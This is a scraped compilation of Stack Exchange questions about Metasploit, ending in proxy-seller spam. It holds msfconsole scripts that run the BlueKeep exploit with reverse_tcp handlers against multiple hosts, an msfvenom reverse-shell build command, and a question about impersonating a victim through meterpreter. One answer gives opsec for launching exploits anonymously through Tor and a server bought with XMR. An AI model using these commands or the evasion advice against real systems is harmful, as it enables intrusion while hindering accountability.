metasploit – Rex::BindFailed The address is already in use or unavailable

I’m trying to run the following script based on https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
setg autorunscript multi_console_command -rc /root/Desktop/folder/met_cmd_file 
setg lhost 192.168.0.90    
setg lport 4444
set ExitOnSession false 
exploit -j
use exploit/windows/rdp/rdp_bluekeep
set EXITFUNC thread
exploit -j

However I’m getting these errors

(*) Started reverse TCP handler on 192.168.0.90:4444 
(*) No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (/root/Desktop/folder/con_cmd_file)> set EXITFUNC thread
EXITFUNC => thread
resource (/root/Desktop/folder/con_cmd_file)> exploit -j
(-) Exploit failed: One or more options failed to validate: RHOST.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.40
(*) Exploit running as background job 1.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.50
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(*) Exploit running as background job 2.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.70
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(*) Exploit running as background job 3.
(*) Exploit completed, but no session was created.
rhost => 192.168.0.80
(*) Exploit running as background job 4.
(*) Exploit completed, but no session was created.
(-) Handler failed to bind to 192.168.0.90:4444:-  -

(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
(-) Handler failed to bind to 192.168.0.90:4444:-  -
(-) Handler failed to bind to 0.0.0.0:4444:-  -
(-) Exploit failed (bad-config): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

I have tried what is suggest on Metasploit Starts attacking multiple targets, results in “address is already in use”

doing

netstat -anpl | grep :4444 I get

tcp        0      0 192.168.0.90:4444       0.0.0.0:*               LISTEN      1741/ruby

while doing
netstat -anpl | grep :4445 I get no nothing

However either I use 4444 or 4445 the result is the same

and running jobs on metasploit I get

0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.0.90:4444

but I can I kill this job if it is the payload?

How can this be fixed?

Run Metasploit module against several IPs

I’m trying to run a module against several IPs. It happens that usually we can use RHOSTS file:/file.txt but in this case, that option is not available.

I have tried this https://www.pentestpartners.com/security-blog/scripting-metasploit-to-exploit-a-group-of-hosts-a-how-to/

My iter_rc.rc file is like this

<ruby>

hostsfile="/root/folder/hosts_file.txt"
hosts=()
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# prepare the handler and console
self.run_single("resource /root/folder/con_cmd_file.txt")
# iterate through each host and run the exploit
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit -j -z") end

</ruby>

and my con_cmd_file.txt is like this

use  <module>
setg autorunscript multi_console_command -rc /root/foldermet_cmd_file.txt
setg lhost <local ip>
set ExitOnSession false
run
set target 1
set disablepayloadhandler true

How can I do it?

I’m getting the following errors

(-) Exploit failed: One or more options failed to validate: RHOST.
(*) Exploit completed, but no session was created.
resource (/root/folder/con_cmd_file.txt)> set target 1
target => 1
resource (/root/folder/con_cmd_file.txt)> set disablepayloadhandler true
disablepayloadhandler => true
rhost => ip1
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip2
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip3
(-) Exploit failed: An invalid argument was specified. Invalid target index.
rhost => ip4
(-) Exploit failed: An invalid argument was specified. Invalid target index.

metasploit – Spoofing IP and/or machine from meterpreter

So, I have a meterpreter session with full rights. I wanted to know if there’s a way to either spoof my IP address so when I visit a website or whatever, the IP they get it’s the victim’s instead of mine. Also, if possible is there a way to “spoof the pc”? I mean like, pretend to websites that I’m using the same device as the victim is.
Thanks in advance

metasploit – Metasploit6 – windows/smb/psexec with EXE::Custom and set DisablePayloadHandler

I’m new to Metasploit and started experimenting with PSEXEC. I generated a payload using msfvenom

msfvenom - windows/x64/meterpreter/reverse_tcp -f exe LHOST=192.168.0.15 LPORT=4545 -o shell.exe

and set it as follows : set EXE::Custom /home/kali/shell.exe

In my setup, the antivirus is turned off on my victim machine to avoid blocking the execution.

My problem is that if I set DisablePayloadHandler true and run the exploit, Metasploit gets stuck on Starting the service for a while then just exits without opening a session.

However, if I set DisablePayloadHandler false, it tells me that the service started successfully, a session opens then dies.

I’m confused because I thought the payload handler should be disabled for the exploit to work using a custom executable. How do I go about using a custom executable with psexec?

tor – is metasploit under whonix anonymous?

Whonix routes all of the network traffic via Tor, so theoretically speaking – yes. However, there are many other ways in which you can be de-anonymized. Just because you send your traffic over Tor, it doesn’t necessarily mean you’re 100% anonymous. For example, the actions you take on the hypothetical machine after the exploitation could de-anonymize you.

I would also advise against installing unnecessary things in Whonix since the process of downloading and installing the binaries could de-anonymize you in itself. A better way of doing this would be to use Whonix for your host (so your traffic is networked via Tor), rent a server with XMR, SSH to that server over Tor, install Metasploit on that server and then use that server to launch your exploit. Then wipe the server entirely when you’re done and burn any credentials, etc. Of course, this isn’t 100% fool proof either. Since the actions you take on the server you’re running the exploit from could also de-anonymize you even if you’re using Tor and paid for the server in XMR.

There’s a lot of useful information about using Whonix correctly & safely in the Whonix documentation, I would highly advise you to read it. There’s also some advice on general opsec practices.

metasploit – How do you execute a base64 payload

metasploit – How do you execute a base64 payload – Information Security Stack Exchange

metasploit – penetration testing For My WP site

metasploit – penetration testing For My WP site – Information Security Stack Exchange

metasploit – Reverse shells that work on every other machine do not connect back on dual booted laptop

I use Parrot OS for Hack the Box every single day, and recently transitioned to a dual boot setup. Ever since I have changed over to this, no form of reverse shell connects back. Steps that I take on a cloud based Virtual Machine produce a reverse shell, but absolutely nothing works on my laptop. I tried doing a reverse shell from my laptop back to myself, and it connects on netcat before immediately dropping out without any other information. Metasploit actually connects and can execute a single command before dying, though I’m not sure if these are just because I’m doing it to my own machine or if it’s part of the problem. If it’s relevant, I did use a patched kernel to enable some drivers for my specific laptop:

https://github.com/linux-surface/linux-surface

This is the full output for what happens when I try reverse shells from my laptop back to myself:

nc:

Listening on 0.0.0.0 4444
Connection received on *IP* 36754

And then it just closes.

Metasploit:

(*) Started reverse TCP handler on IP:4444 
(*) Command shell session 1 opened (IP:4444 -> IP:36760) at 2021-05-05 20:28:06 -0700

echo test
echo test
test

And then metasploit crashes and it returns to a bash prompt.

Please let me know if there is any information that is needed to help fix this, it’s become a very annoying issue.

DreamProxies - Cheapest USA Elite Private Proxies 100 Cheapest USA Private Proxies Buy 200 Cheap USA Private Proxies 400 Best Private Proxies Cheap 1000 USA Private Proxies 2000 USA Private Proxies 5000 Cheap USA Private Proxies ExtraProxies.com - Buy Cheap Private Proxies Buy 50 Private Proxies Buy 100 Private Proxies Buy 200 Private Proxies Buy 500 Private Proxies Buy 1000 Private Proxies Buy 2000 Private Proxies ProxiesLive.com Proxies-free.com New Proxy Lists Every Day Proxies123.com Proxyti.com Buy Quality Private Proxies